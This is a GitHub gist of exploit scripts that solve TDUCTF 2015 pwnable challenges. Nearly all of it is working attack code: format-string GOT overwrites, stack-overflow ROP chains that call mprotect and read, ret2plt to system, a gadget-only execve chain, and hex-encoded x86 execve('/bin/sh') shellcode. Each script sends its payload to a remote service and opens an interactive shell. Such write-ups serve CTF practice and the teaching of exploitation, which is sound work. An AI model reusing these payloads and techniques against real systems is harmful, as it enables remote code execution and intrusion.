@rekkusu
Last active August 31, 2015 09:41
TDUCTF 2015 Pwnable writeup
# Solve script for a format-string challenge (Python 2 / pwntools era:
# str payloads, `print` statements and str.decode('hex') elsewhere in
# this gist do not run on Python 3).
from pwn import *
from libformatstr import FormatStr
import time  # NOTE(review): unused in this script
s = remote('crackme.sakura.tductf.org', 10773)
# Fixed addresses taken from the challenge binary; they only hold for a
# non-PIE build with these exact symbols.
read_secret = 0x0804875d
strlen_got = 0x8049138
exit_got = 0x804912c
puts_plt = 0x8048580
s.recvuntil('You: ')
# libformatstr turns the address -> value mapping into a format-string
# write payload. The argument 6 is the stack-argument index at which the
# format buffer is found (presumably determined by probing; not derived here).
fmt = FormatStr()
fmt[strlen_got] = puts_plt    # write puts@plt into strlen's GOT slot
fmt[exit_got] = read_secret   # write read_secret into exit's GOT slot
payload = fmt.payload(6)
s.send(payload + '\n')
s.interactive()
# Second solve for the same service: a single GOT write redirects exit()
# to a fixed buffer that the next input line is read into.
from pwn import *
from libformatstr import FormatStr
import time  # NOTE(review): unused in this script
s = remote('crackme.sakura.tductf.org', 10773)
# Hex-encoded x86 shellcode (Python 2 str.decode('hex')).
sc = '31c931d252682f2f7368682f62696e89e331c0b00bcd80'.decode('hex')
# buf is assumed to be the static buffer the second line lands in and to be
# mapped executable (NX off) — TODO confirm against the binary.
buf = 0x80491a0
exit_got = 0x804912c
s.recvuntil('You: ')
fmt = FormatStr()
fmt[exit_got] = buf   # exit's GOT slot now holds the buffer address
payload = fmt.payload(6)  # 6: stack-argument index of the format buffer
s.send(payload + '\n')
s.send(sc + '\n')  # second line: the bytes that exit() will jump to
s.interactive()
# Stack-overflow solve: a short ROP chain calls mprotect() on a fixed page,
# then read() into it, then returns into the bytes just read.
from pwn import *
import time
s = remote('crackme.sakura.tductf.org', 10195)
# Hex-encoded x86 shellcode (Python 2 str.decode('hex')).
sc = '31c931d252682f2f7368682f62696e89e331c0b00bcd80'.decode('hex')
# Fixed (non-PIE) addresses from the challenge binary.
read_plt = 0x080483a0
mprotect_plt = 0x8048390
popret = 0x8048365      # pops one stack slot, then ret
pop3ret = 0x80485d9     # pops three stack slots, then ret
buf = 0x8049000         # page-aligned target for mprotect()/read()
payload = ''.join([
    'A' * 16,             # padding up to the saved return address
    p32(mprotect_plt),    # mprotect(buf, 0x1000, 7)
    p32(pop3ret),         # discard the three arguments below, then ret
    p32(buf),
    p32(0x1000),
    p32(0x7),             # PROT_READ | PROT_WRITE | PROT_EXEC
    p32(read_plt),        # read(0, buf, 0x100)
    p32(popret),          # pops the `0`, then ret — i.e. returns into buf
    p32(0),
    p32(buf),
    p32(0x100)
])
print 'len:', len(payload)
# NOTE(review): `assert` is stripped under `python -O`; the 0x38 bound is
# presumably the overflow budget of the vulnerable read — verify separately.
assert(len(payload) <= 0x38)
s.send(payload)
time.sleep(0.5)  # let the chain reach read() before the second send
s.send(sc)
s.interactive()
# She'll code ...
# Two-input solve: the first prompt stores shellcode at a fixed buffer, the
# second prompt overflows into the return address and points it there.
from pwn import *
import time  # NOTE(review): unused in this script
s = remote('crackme.sakura.tductf.org', 47806)
# Hex-encoded x86 shellcode (Python 2 str.decode('hex')).
sc = '31c931d252682f2f7368682f62696e89e331c0b00bcd80'.decode('hex')
# Fixed address of the buffer that receives the first input — assumed
# non-PIE and executable (TODO confirm).
buf = 0x8049aa0
s.recvuntil('about you:')
# Leading p32(buf + 4) occupies the first 4 bytes, so the shellcode itself
# starts at buf + 4, matching the return address written below.
s.send(p32(buf + 4) + sc + '\n')
s.recvuntil('message:')
payload = ''.join([
    'A' * 38,             # padding up to the saved return address
    p32(0x8049aa0 + 4)    # == buf + 4; return into the stored shellcode
])
s.send(payload + '\n')
s.interactive()
# ret2libc for newbie
# Classic ret2plt: return into system@plt with a fake return address and a
# pointer to a "/bin/sh" string that already exists in the binary.
from pwn import *
s = remote('crackme.sakura.tductf.org', 10170)
system_plt = 0x8048410   # fixed (non-PIE) PLT stub
binsh = 0x80486ad        # address of the in-binary string argument
# 16 bytes of padding, system@plt, 'BBBB' as the dummy return address, argument.
s.send('A' * 16 + p32(system_plt) + 'BBBB' + p32(binsh))
s.interactive()
# "Pieces" solve using memset@plt: the chain writes the shellcode one byte
# at a time into the executable region whose address the service prints,
# then returns into it.
from pwn import *
import time
s = remote('crackme.sakura.tductf.org', 20562)
# waiting pieces
time.sleep(2)
# Hex-encoded x86 shellcode (Python 2 str.decode('hex')).
sc = '31c931d252682f2f7368682f62696e89e331c0b00bcd80'.decode('hex')
pop3ret = 0x8048b19      # pops three stack slots, then ret
memset_plt = 0x8048660
s.recvuntil('Pieces will be here: ')
# The service leaks the address of the executable "pieces" region; only this
# value is runtime-derived, the PLT/gadget addresses above are fixed.
executable = int(s.recvuntil('\n'), 16)
print 'exec:', hex(executable)
payload = ''
# One memset(executable + i, sc[i], 1) call per shellcode byte; pop3ret
# discards the three arguments so the next call follows.
for i in range(len(sc)):
    payload += ''.join([
        p32(memset_plt),
        p32(pop3ret),
        p32(executable + i),
        p32(ord(sc[i])),
        p32(1),
    ])
payload += p32(executable)  # finally return into the assembled bytes
s.send(payload)
s.interactive()
from pwn import *
import time
# Version without memset (solved after the CTF ended).
# Only the leaked "pieces" gadgets are used: a 2-byte `int 0x80` is stored
# into the pieces region with `mov [eax], ax`, then registers are set up
# for execve via the pop gadgets. Gadget offsets are listed at the bottom.
#s = remote('crackme.sakura.tductf.org', 20562)
s = remote('192.168.6.129', 4000)  # local re-host used after the event
# waiting pieces
time.sleep(2)
s.recvuntil('Pieces will be here: ')
piece = int(s.recvuntil('\n'), 16)       # base of the leaked gadget region
print 'piece:', hex(piece)
s.recvuntil('board: ')
rop_buf = int(s.recvuntil('\n'), 16)     # address this payload lands at
print 'rop_buf:', hex(rop_buf)
# An address inside the same 64 KiB block as `piece` whose low 16 bits are
# 0x80cd. Writing `ax` (== 0x80cd) to that address therefore stores the
# bytes cd 80 (`int 0x80`) at the address itself, so it can be returned to.
# Assumes that address is writable and executable — TODO confirm.
int80 = piece & 0xffff0000 | 0x80cd
payload = ''.join([
    p32(piece + 0x10), # pop eax
    p32(int80),
    p32(piece + 0x50), # mov [eax], ax
    p32(piece + 0x10), # pop eax
    p32(11),           # execve syscall number (x86)
    p32(piece + 0x16), # pop ebx
    p32(rop_buf + 0x80),  # -> "/bin/sh" placed at offset 0x80 below
    p32(piece + 0x12), # pop ecx
    p32(0),
    p32(piece + 0x14), # pop edx
    p32(0),
    p32(int80)         # return into the freshly written `int 0x80`
])
# Pad the chain to 0x80 bytes so the string sits exactly at rop_buf + 0x80.
payload = payload.ljust(0x80, 'A') + '/bin/sh\0'
s.send(payload)
s.interactive()
# Disassembly of the "pieces" gadget region referenced by the offsets above.
# Kept as a bare string expression; it has no runtime effect.
'''
pieces
00000000 50 push eax
00000001 C3 ret
00000002 51 push ecx
00000003 C3 ret
00000004 52 push edx
00000005 C3 ret
00000006 53 push ebx
00000007 C3 ret
00000008 54 push esp
00000009 C3 ret
0000000A 55 push ebp
0000000B C3 ret
0000000C 56 push esi
0000000D C3 ret
0000000E 57 push edi
0000000F C3 ret
00000010 58 pop eax
00000011 C3 ret
00000012 59 pop ecx
00000013 C3 ret
00000014 5A pop edx
00000015 C3 ret
00000016 5B pop ebx
00000017 C3 ret
00000018 5C pop esp
00000019 C3 ret
0000001A 5D pop ebp
0000001B C3 ret
0000001C 5E pop esi
0000001D C3 ret
0000001E 5F pop edi
0000001F C3 ret
00000020 83C404 add esp,byte +0x4
00000023 C3 ret
00000024 83C408 add esp,byte +0x8
00000027 C3 ret
00000028 83C40C add esp,byte +0xc
0000002B C3 ret
0000002C 83EC04 sub esp,byte +0x4
0000002F C3 ret
00000030 83EC08 sub esp,byte +0x8
00000033 C3 ret
00000034 83EC0C sub esp,byte +0xc
00000037 C3 ret
00000038 FFD0 call eax
0000003A C3 ret
0000003B FFD1 call ecx
0000003D C3 ret
0000003E FFD2 call edx
00000040 C3 ret
00000041 FFD3 call ebx
00000043 C3 ret
00000044 FFD4 call esp
00000046 C3 ret
00000047 FFD5 call ebp
00000049 C3 ret
0000004A FFD6 call esi
0000004C C3 ret
0000004D 8900 mov [eax],eax
0000004F C3 ret
00000050 668900 mov [eax],ax
00000053 C3 ret
00000054 8800 mov [eax],al
00000056 C3 ret
00000057 8820 mov [eax],ah
00000059 C3 ret
'''
# Third "pieces" variant: the chain calls through the PLT resolver stub to
# read() a second message directly into the leaked executable region, then
# returns into it.
from pwn import *
import time
# Hex-encoded x86 shellcode (Python 2 str.decode('hex')).
sc = '31c931d252682f2f7368682f62696e89e331c0b00bcd80'.decode('hex')
# `relocation` is presumably PLT0 (the lazy-binding stub) and `read_offset`
# the .rel.plt offset for read — TODO confirm against the binary.
relocation = 0x8048560
read_offset = 0x8
#s = remote('crackme.sakura.tductf.org', 20562)
s = remote('192.168.6.129', 4000)  # local re-host used after the event
# waiting pieces
time.sleep(2)
s.recvuntil('Pieces will be here: ')
piece = int(s.recvuntil('\n'), 16)       # base of the leaked executable region
print 'piece:', hex(piece)
s.recvuntil('board: ')
rop_buf = int(s.recvuntil('\n'), 16)     # leaked but unused in this script
print 'rop_buf:', hex(rop_buf)
payload = ''.join([
    p32(relocation),   # jump to the resolver stub with ...
    p32(read_offset),  # ... this relocation index -> resolves and calls read
    p32(piece),        # return address after read(): the region just filled
    p32(0),            # read(0, piece, 0x100)
    p32(piece),
    p32(0x100),
])
s.send(payload)
time.sleep(0.5)  # let the chain reach read() before the second send
s.send(sc)
s.interactive()
# shellcode for newbie
# The service executes its input directly: send the shellcode padded with
# NUL bytes to a fixed 256-byte message.
from pwn import *
s = remote('crackme.sakura.tductf.org', 10150)
# Hex-encoded x86 shellcode with a trailing 00 byte (Python 2 str.decode('hex')).
sc = '31c931d252682f2f7368682f62696e89e331c0b00bcd8000'.decode('hex')
s.send(sc.ljust(256, '\0'))
s.interactive()